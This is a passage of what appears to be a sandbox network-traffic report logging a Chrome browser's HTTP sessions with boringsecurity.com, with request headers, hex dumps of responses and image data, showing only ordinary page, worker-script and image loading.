                                                                          2023-12-10 16:44:57 UTC322INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 34 20 4e 6f 74 20 4d 6f 64 69 66 69 65 64 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 37 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 30 39 32 32 65 33 34 64 66 39 61 66 65 63 37 36 36 30 62 66 64 61 65 62 34 33 30 36 31 65 61 33 2d 73 73 6c 22 0d 0a 53 65 72 76 65 72 3a 20 4e 65 74 6c 69 66 79 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 0d
                                                                          Data Ascii: HTTP/1.1 304 Not ModifiedCache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitDate: Sun, 10 Dec 2023 16:44:57 GMTEtag: "0922e34df9afec7660bfdaeb43061ea3-ssl"Server: NetlifyStrict-Transport-Security: max-age=31536000


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          142192.168.2.54987523.92.19.1444435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:57 UTC354OUTGET /graphql/ HTTP/1.1
                                                                          Host: cms.boringsecurity.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:58 UTC985INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 4f 72 69 67 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 3b 69 6d 67 2d 73 72 63 20 27 73 65 6c 66 27 20 64 61 74 61 3a 20 63 64 6e 2e
                                                                          Data Ascii: HTTP/1.1 400 Bad RequestServer: nginx/1.18.0Date: Sun, 10 Dec 2023 16:45:04 GMTContent-Type: text/plain; charset=utf-8Content-Length: 18Connection: closeVary: OriginContent-Security-Policy: connect-src 'self' https:;img-src 'self' data: cdn.
                                                                          2023-12-10 16:44:58 UTC18INGET query missing.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          143192.168.2.54987675.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:58 UTC520OUTGET /parseGridNftDataToCanvas.worker.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Origin: https://boringsecurity.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: same-origin
                                                                          Sec-Fetch-Dest: worker
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          If-None-Match: "0922e34df9afec7660bfdaeb43061ea3-ssl"
                                                                          2023-12-10 16:44:58 UTC322INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 34 20 4e 6f 74 20 4d 6f 64 69 66 69 65 64 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 38 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 30 39 32 32 65 33 34 64 66 39 61 66 65 63 37 36 36 30 62 66 64 61 65 62 34 33 30 36 31 65 61 33 2d 73 73 6c 22 0d 0a 53 65 72 76 65 72 3a 20 4e 65 74 6c 69 66 79 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 0d
                                                                          Data Ascii: HTTP/1.1 304 Not ModifiedCache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitDate: Sun, 10 Dec 2023 16:44:58 GMTEtag: "0922e34df9afec7660bfdaeb43061ea3-ssl"Server: NetlifyStrict-Transport-Security: max-age=31536000


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          144192.168.2.54987723.92.19.1444435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:58 UTC354OUTGET /graphql/ HTTP/1.1
                                                                          Host: cms.boringsecurity.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:58 UTC985INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 4f 72 69 67 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 3b 69 6d 67 2d 73 72 63 20 27 73 65 6c 66 27 20 64 61 74 61 3a 20 63 64 6e 2e
                                                                          Data Ascii: HTTP/1.1 400 Bad RequestServer: nginx/1.18.0Date: Sun, 10 Dec 2023 16:45:04 GMTContent-Type: text/plain; charset=utf-8Content-Length: 18Connection: closeVary: OriginContent-Security-Policy: connect-src 'self' https:;img-src 'self' data: cdn.
                                                                          2023-12-10 16:44:58 UTC18INGET query missing.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          145192.168.2.54987875.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:58 UTC520OUTGET /parseGridNftDataToCanvas.worker.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Origin: https://boringsecurity.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: same-origin
                                                                          Sec-Fetch-Dest: worker
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          If-None-Match: "0922e34df9afec7660bfdaeb43061ea3-ssl"
                                                                          2023-12-10 16:44:58 UTC322INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 34 20 4e 6f 74 20 4d 6f 64 69 66 69 65 64 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 38 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 30 39 32 32 65 33 34 64 66 39 61 66 65 63 37 36 36 30 62 66 64 61 65 62 34 33 30 36 31 65 61 33 2d 73 73 6c 22 0d 0a 53 65 72 76 65 72 3a 20 4e 65 74 6c 69 66 79 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 0d
                                                                          Data Ascii: HTTP/1.1 304 Not ModifiedCache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitDate: Sun, 10 Dec 2023 16:44:58 GMTEtag: "0922e34df9afec7660bfdaeb43061ea3-ssl"Server: NetlifyStrict-Transport-Security: max-age=31536000


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          146192.168.2.54987975.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:58 UTC607OUTGET /images/bs_x_murall_160.jpg HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:58 UTC395INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 35 30 39 33 31 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 30 32 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 38 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 32 39 65 30 39 39 33 32 30 37 66 32 36 38 38 39 62 64 65 39 30 62 35 62 35 61 39
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 50931Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 20244Content-Type: image/jpegDate: Sun, 10 Dec 2023 16:44:58 GMTEtag: "29e0993207f26889bde90b5b5a9
                                                                          2023-12-10 16:44:58 UTC791INData Raw: ff d8 ff e1 00 22 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 01 01 12 00 03 00 00 00 01 00 01 00 00 00 00 00 00 ff ed 18 48 50 68 6f 74 6f 73 68 6f 70 20 33 2e 30 00 38 42 49 4d 04 04 00 00 00 00 00 07 1c 02 00 00 02 00 00 00 38 42 49 4d 04 25 00 00 00 00 00 10 e8 f1 5c f3 2f c1 18 a1 a2 7b 67 ad c5 64 d5 ba 38 42 49 4d 04 3a 00 00 00 00 00 e5 00 00 00 10 00 00 00 01 00 00 00 00 00 0b 70 72 69 6e 74 4f 75 74 70 75 74 00 00 00 05 00 00 00 00 50 73 74 53 62 6f 6f 6c 01 00 00 00 00 49 6e 74 65 65 6e 75 6d 00 00 00 00 49 6e 74 65 00 00 00 00 43 6c 72 6d 00 00 00 0f 70 72 69 6e 74 53 69 78 74 65 65 6e 42 69 74 62 6f 6f 6c 00 00 00 00 0b 70 72 69 6e 74 65 72 4e 61 6d 65 54 45 58 54 00 00 00 01 00 00 00 00 00 0f 70 72 69 6e 74 50 72 6f 6f 66 53 65 74 75 70 4f
                                                                          Data Ascii: "ExifMM*HPhotoshop 3.08BIM8BIM%\/{gd8BIM:printOutputPstSboolInteenumInteClrmprintSixteenBitboolprinterNameTEXTprintProofSetupO
                                                                          2023-12-10 16:44:58 UTC2372INData Raw: 00 00 00 00 10 63 72 6f 70 57 68 65 6e 50 72 69 6e 74 69 6e 67 62 6f 6f 6c 00 00 00 00 0e 63 72 6f 70 52 65 63 74 42 6f 74 74 6f 6d 6c 6f 6e 67 00 00 00 00 00 00 00 0c 63 72 6f 70 52 65 63 74 4c 65 66 74 6c 6f 6e 67 00 00 00 00 00 00 00 0d 63 72 6f 70 52 65 63 74 52 69 67 68 74 6c 6f 6e 67 00 00 00 00 00 00 00 0b 63 72 6f 70 52 65 63 74 54 6f 70 6c 6f 6e 67 00 00 00 00 00 38 42 49 4d 03 ed 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 00 00 01 00 01 38 42 49 4d 04 26 00 00 00 00 00 0e 00 00 00 00 00 00 00 00 00 00 3f 80 00 00 38 42 49 4d 03 f2 00 00 00 00 00 0a 00 00 ff ff ff ff ff ff 00 00 38 42 49 4d 04 0d 00 00 00 00 00 04 00 00 00 5a 38 42 49 4d 04 19 00 00 00 00 00 04 00 00 00 1e 38 42 49 4d 03 f3 00 00 00 00 00 09 00 00 00 00 00 00 00 00 01 00
                                                                          Data Ascii: cropWhenPrintingboolcropRectBottomlongcropRectLeftlongcropRectRightlongcropRectToplong8BIMHH8BIM&?8BIM8BIMZ8BIM8BIM
                                                                          2023-12-10 16:44:58 UTC538INData Raw: 0a a6 89 6a b5 4b 9b b8 08 e3 42 92 93 d0 dd dd a5 5e aa 20 47 74 0a 83 49 dd de 15 86 38 7d dd 92 52 5d a6 41 ec 88 21 a2 04 ea a0 d7 08 f0 fe 2a 72 23 53 3e 09 29 62 e7 83 cc ca 8b c8 db c2 93 80 03 4e 67 55 07 19 f9 24 a4 2f 1a 7c 7f 05 4e c6 eb 3d 81 95 6e d7 69 a6 be 28 0f 3d d2 53 46 f6 02 09 6e 9e 0a 95 8d 78 24 b8 48 e1 68 df c8 f2 24 fd ea a5 ad 3e 12 7c 12 53 46 c6 b6 0a a9 60 20 f3 c7 7f 15 71 e2 04 11 3e 08 0f e7 5d 12 53 5c 8d 39 f2 51 23 43 a2 21 6f 92 6d a1 24 bf ff d1 e6 1b 08 8d 1a 88 42 00 f0 8b 5c ee e2 51 52 6a c4 19 f0 56 2b 07 c1 01 82 00 f3 56 2b 2e dd 11 f2 49 0d ba 87 1e 2a d5 7b 43 81 fc ef 25 55 86 23 c7 c7 f8 23 30 ba 01 6c 6e 49 4d ea 9c 00 d4 fc 91 da 76 ce 93 d8 2a 95 c3 80 9f 9f c5 1e 7f 04 94 da 63 c9 1c c4 99 27 94 ed 78
                                                                          Data Ascii: jKB^ GtI8}R]A!*r#S>)bNgU$/|N=ni(=SFnx$Hh$>|SF` q>]S\9Q#C!om$B\QRjV+V+.I*{C%U##0lnIMv*c'x
                                                                          2023-12-10 16:44:58 UTC4744INData Raw: 13 17 92 7c 02 09 74 05 1f 50 c1 0e 12 92 92 3c 96 92 79 ec 83 63 e4 38 1f 97 c7 e0 9b 73 9e fd a0 12 e7 e8 07 8a 0f 50 eb 38 bd 25 9b 29 22 ec c7 72 e1 c8 23 f7 09 fe 66 af f8 4f e7 6e 49 49 0e 26 56 d0 eb 9a 29 07 51 ea 90 d2 7f b1 f4 ff 00 e8 a0 59 8e e6 88 6d 8d 71 e7 40 ef e2 d5 ce e4 f5 4e a5 96 f7 3a cb 9c d0 e3 ab 59 ed 1f f9 37 7f 69 ca bc 5b b8 00 f7 ef 3c 00 5c 5c 67 41 00 7b 92 55 3b d6 57 6b 64 91 20 77 6f 64 17 1d 25 57 2d eb 78 20 ba d6 b9 cc af e9 b1 e4 38 b3 c5 af da 77 d4 e5 62 9c 9a 32 d8 48 fd 1d ad 1e e0 ee df 77 d2 67 fc 22 49 43 dc 84 b8 d0 77 52 70 32 74 d4 72 14 66 66 7f 0e c8 29 ff d3 e6 da 34 93 dd 35 d6 8a da 4c 6b f9 be 69 0d 35 26 00 d4 a1 7a f8 8e 77 eb 15 59 63 47 1e 9b c3 74 f9 b5 15 36 fa 3e 45 6c aa d2 fb 58 2d 7d bb b6
                                                                          Data Ascii: |tP<yc8sP8%)"r#fOnII&V)QYmq@N:Y7i[<\\gA{U;Wkd wod%W-x 8wb2Hwg"ICwRp2trff)45Lki5&zwYcGt6>ElX-}
                                                                          2023-12-10 16:44:58 UTC5930INData Raw: 30 39 46 44 43 42 44 45 33 39 34 31 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 41 30 30 38 42 44 41 34 30 41 36 33 42 46 43 37 41 39 41 35 33 34 34 36 35 30 46 33 44 43 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 37 42 46 46 30 32 31 37 31 44 46 39 34 45 39 34 41 33 46 33 38 41 32 39 32 43 42 46 42 31 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 38 35 33 43 43 34 36 32 44 38 41 38 41 38 44 30 33 39 39 31 33 37 34 30 45 39 39 36 34 31 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 33 31 33 44 39 45 45 42 41 43 41 42 43 45 43 32 35 42 36 41 33 30 33 36 45 32 35 33 42 30 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 42 39 37 45 42 45 34 30 32 41 42 41 31 45 42 41 45 44 46 41 38 34 44
                                                                          Data Ascii: 09FDCBDE3941E</rdf:li> <rdf:li>6A008BDA40A63BFC7A9A5344650F3DC3</rdf:li> <rdf:li>A7BFF02171DF94E94A3F38A292CBFB13</rdf:li> <rdf:li>A853CC462D8A8A8D039913740E99641D</rdf:li> <rdf:li>B313D9EEBACABCEC25B6A3036E253B00</rdf:li> <rdf:li>BB97EBE402ABA1EBAEDFA84D
                                                                          2023-12-10 16:44:58 UTC5869INData Raw: c8 bf 51 a1 c8 11 d6 9d 31 21 14 f7 50 6e 74 5e 8b 4f a7 0a f1 d5 43 66 41 a6 67 fa 87 6a 53 3c 1d a8 37 15 6f d4 34 a9 3e 78 8d 1c d0 c6 32 50 35 3e 27 5c 4a bb 68 55 76 8a 67 95 7a e2 a0 02 5c 57 61 d4 11 91 ae 17 21 46 14 39 66 2b 89 08 35 14 21 68 34 61 97 f1 c0 89 be b4 01 e2 61 99 04 52 a0 e3 61 ab b8 20 39 6c 81 df e0 31 1d ac 82 91 a3 36 67 32 a3 b1 a6 54 e8 2b 87 90 33 aa 44 ab f4 81 ea 1d 1b 71 d0 f7 18 81 ce ca 26 c2 c1 81 a3 13 95 3a e5 d7 0a 62 42 e8 c4 05 52 06 dd 72 fb b0 f1 4c d1 d2 11 4a 14 2a c7 6f 40 46 5e 3a 62 47 28 d2 04 90 ee 68 f2 00 8c f2 ae 00 fd ba ca 35 0c 4d 32 39 d0 9a 53 5c 31 96 15 44 62 44 2d 5d fe dd 75 1e 67 11 20 89 98 b9 34 21 6a 6a 05 7e ca f4 c5 c3 98 06 fd 40 70 49 07 a8 1a 68 31 b4 0d cb b8 98 d9 a8 49 46 1a 1a 76
                                                                          Data Ascii: Q1!Pnt^OCfAgjS<7o4>x2P5>'\JhUvgz\Wa!F9f+5!h4aaRa 9l16g2T+3Dq&:bBRrLJ*o@F^:bG(h5M29S\1DbD-]ug 4!jj~@pIh1IFv


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          147192.168.2.54988075.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:58 UTC693OUTGET /_next/image?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Artboard_3_300f496b90.jpg&w=1080&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:58 UTC514INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 38 20 47 4d 54 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 2f 5f 69 70 78 2f 77 5f 31 30 38 30 2c 71 5f 37 35 2f 68 74 74 70 73 25 33 41 25 32 46 25 32 46 62 6f 72 69 6e 67 2d 73 65 63 75 72 69 74 79 2d 63 6d 73 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 6c 61 72 67 65 5f 41 72 74 62 6f 61 72 64 5f 33 5f 33 30 30 66 34 39 36 62 39 30 2e 6a 70 67
                                                                          Data Ascii: HTTP/1.1 301 Moved PermanentlyAge: 0Cache-Status: "Netlify Edge"; fwd=missContent-Type: text/plainDate: Sun, 10 Dec 2023 16:44:58 GMTLocation: /_ipx/w_1080,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Artboard_3_300f496b90.jpg
                                                                          2023-12-10 16:44:58 UTC225INData Raw: 64 62 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f 5f 69 70 78 2f 77 5f 31 30 38 30 2c 71 5f 37 35 2f 68 74 74 70 73 25 33 41 25 32 46 25 32 46 62 6f 72 69 6e 67 2d 73 65 63 75 72 69 74 79 2d 63 6d 73 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 6c 61 72 67 65 5f 41 72 74 62 6f 61 72 64 5f 33 5f 33 30 30 66 34 39 36 62 39 30 2e 6a 70 67 3f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 62 6f 72 69 6e 67 2d 73 65 63 75 72 69 74 79 2d 63 6d 73 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 6c 61 72 67 65 5f 41 72 74 62 6f 61 72 64 5f 33 5f 33 30 30 66 34 39 36 62 39 30 2e 6a 70 67 26 77 3d 31 30 38 30 26 71 3d 37 35 0a 0d 0a
                                                                          Data Ascii: dbRedirecting to /_ipx/w_1080,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Artboard_3_300f496b90.jpg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Artboard_3_300f496b90.jpg&w=1080&q=75
                                                                          2023-12-10 16:44:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          148192.168.2.54988123.92.19.1444435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:59 UTC354OUTGET /graphql/ HTTP/1.1
                                                                          Host: cms.boringsecurity.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:59 UTC985INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 4f 72 69 67 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 3b 69 6d 67 2d 73 72 63 20 27 73 65 6c 66 27 20 64 61 74 61 3a 20 63 64 6e 2e
                                                                          Data Ascii: HTTP/1.1 400 Bad RequestServer: nginx/1.18.0Date: Sun, 10 Dec 2023 16:45:05 GMTContent-Type: text/plain; charset=utf-8Content-Length: 18Connection: closeVary: OriginContent-Security-Policy: connect-src 'self' https:;img-src 'self' data: cdn.
                                                                          2023-12-10 16:44:59 UTC18INGET query missing.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          149192.168.2.54988375.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:59 UTC520OUTGET /parseGridNftDataToCanvas.worker.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Origin: https://boringsecurity.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: same-origin
                                                                          Sec-Fetch-Dest: worker
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
